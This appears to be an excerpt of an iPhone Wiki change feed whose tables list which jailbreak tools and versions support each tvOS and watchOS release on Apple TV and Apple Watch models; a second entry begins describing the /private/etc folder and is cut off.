| rowspan=&amp;quot;2&amp;quot; | 10.2.2&lt;br /&gt;
| [[backr00m]]&lt;br /&gt;
| Any&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[greeng0blin]]&lt;br /&gt;
| 1.1&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==== 11.x ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | tvOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;2&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[J42dAP|Apple TV (4th generation)]]&lt;br /&gt;
! [[J105aAP|Apple TV 4K]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 11.0&lt;br /&gt;
| [[backr00m]]&lt;br /&gt;
| Any&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;22&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[LiberTV]]&lt;br /&gt;
| 1.1&lt;br /&gt;
|-&lt;br /&gt;
| [[Electra|electraTV]]&lt;br /&gt;
| 1.3.2&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 11.1&lt;br /&gt;
| [[backr00m]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| [[LiberTV]]&lt;br /&gt;
| 1.1&lt;br /&gt;
|-&lt;br /&gt;
| [[Electra|electraTV]]&lt;br /&gt;
| 1.3.2&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.2&lt;br /&gt;
| [[Electra|electraTV]]&lt;br /&gt;
| 1.0.4-1.3.2&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.2.1&lt;br /&gt;
| [[Electra|electraTV]]&lt;br /&gt;
| 1.0.4-1.3.2&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.2.5&lt;br /&gt;
| [[Electra|electraTV]]&lt;br /&gt;
| 1.0.4-1.3.2&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.2.6&lt;br /&gt;
| [[Electra|electraTV]]&lt;br /&gt;
| 1.0.4-1.3.2&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.3&lt;br /&gt;
| [[Electra|electraTV]]&lt;br /&gt;
| 1.0.4-1.3.2&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.4&lt;br /&gt;
| [[Electra|electraTV]]&lt;br /&gt;
| 1.0.4-1.3.2&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.4.1&lt;br /&gt;
| [[Electra|electraTV]]&lt;br /&gt;
| 1.0.4-1.3.2&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==== 12.x ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | tvOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;2&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[J42dAP|Apple TV (4th generation)]]&lt;br /&gt;
! [[J105aAP|Apple TV 4K]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 12.0&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Chimera|ChimeraTV]]&lt;br /&gt;
| 1.3.9&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 12.0.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Chimera|ChimeraTV]]&lt;br /&gt;
| 1.3.9&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 12.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Chimera|ChimeraTV]]&lt;br /&gt;
| 1.3.9&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 12.1.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Chimera|ChimeraTV]]&lt;br /&gt;
| 1.3.9&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 12.1.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Chimera|ChimeraTV]]&lt;br /&gt;
| 1.3.9&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 12.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Chimera|ChimeraTV]]&lt;br /&gt;
| 1.3.9&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.2.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 12.4&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Chimera|ChimeraTV]]&lt;br /&gt;
| 1.3.9&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.4.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.1 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==== 13.x ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | tvOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;2&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[J42dAP|Apple TV (4th generation)]]&lt;br /&gt;
! [[J105aAP|Apple TV 4K]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.0&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.3.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.4&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.4.5&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0verTV]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 13.4.6&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&amp;lt;br&amp;gt;&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;&amp;lt;/ref&amp;gt;&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 13.4.8&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&amp;lt;br&amp;gt;&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;&amp;lt;/ref&amp;gt;&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references&amp;gt;&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;Check the &amp;quot;Allow untested iOS/iPadOS/tvOS versions&amp;quot; checkbox in the options view to bypass the version check.&amp;lt;/ref&amp;gt;&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===watchOS===&lt;br /&gt;
====1.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | watchOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;2&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[Apple Watch (1st generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| 1.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0.1&lt;br /&gt;
| {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
====2.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | watchOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;2&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[Apple Watch (1st generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| 2.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;6&amp;quot; | No Tool Available&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 2.0.1&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 2.1&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 2.2&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 2.2.1&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 2.2.2&lt;br /&gt;
| {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
====3.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | watchOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;3&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[Apple Watch (1st generation)]]&lt;br /&gt;
! [[Apple Watch Series 1]]&lt;br /&gt;
! [[Apple Watch Series 2]]&lt;br /&gt;
|-&lt;br /&gt;
| 3.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;7&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 3.1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 3.1.1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 3.1.3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 3.2&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 3.2.2&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 3.2.3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
====4.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | watchOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;4&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[Apple Watch (1st generation)]]&lt;br /&gt;
! [[Apple Watch Series 1]]&lt;br /&gt;
! [[Apple Watch Series 2]]&lt;br /&gt;
! [[Apple Watch Series 3]]&lt;br /&gt;
|-&lt;br /&gt;
| 4.0&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | [[jelbrekTime]]&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 1.0&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref name=&amp;quot;SSH_dev&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| 4.0.1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref name=&amp;quot;SSH_dev&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| 4.1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref name=&amp;quot;SSH_dev&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| 4.2&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;6&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 4.2.2&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 4.2.3&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 4.3&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 4.3.1&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 4.3.2&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;SSH_dev&amp;quot;&amp;gt;Only SSH support is included with this jailbreak, making it useless to the average jailbreak user.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====5.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | watchOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;4&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[Apple Watch Series 1]]&lt;br /&gt;
! [[Apple Watch Series 2]]&lt;br /&gt;
! [[Apple Watch Series 3]]&lt;br /&gt;
! [[Apple Watch Series 4]]&lt;br /&gt;
|-&lt;br /&gt;
| 5.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;17&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.0.1&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.1&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.1.1&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.1.2&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.1.3&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.2&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.2.1&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.3&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.3.1&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.3.2&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.3.3&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.3.4&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.3.5&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.3.6&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.3.7&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 5.3.8&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
====6.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | watchOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;5&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[Apple Watch Series 1]]&lt;br /&gt;
! [[Apple Watch Series 2]]&lt;br /&gt;
! [[Apple Watch Series 3]]&lt;br /&gt;
! [[Apple Watch Series 4]]&lt;br /&gt;
! [[Apple Watch Series 5]]&lt;br /&gt;
|-&lt;br /&gt;
| 6.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;11&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.0.1&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.1&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.1.1&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.1.2&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.1.3&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.2&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.2.1&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.2.5&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.2.6&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.2.8&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==See Also==&lt;br /&gt;
* [[Failbreak]]&lt;br /&gt;
* [[Jailbreak Exploits]]&lt;br /&gt;
* [[Kernel Patches]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Jailbreaking]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=/private/etc&amp;diff=105808</id>
		<title>/private/etc</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=/private/etc&amp;diff=105808"/>
		<updated>2020-07-14T20:52:14Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Folders */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This folder is specified by the [[wikipedia:Filesystem Hierarchy Standard|FHS]] as a place that &amp;quot;contains configuration files&amp;quot; (i.e. &amp;quot;local file[s] used to control the operation of a program&amp;quot;). Most of the folders here are not present in jailed iOS except for raccoon, asl, and ppp.&lt;br /&gt;
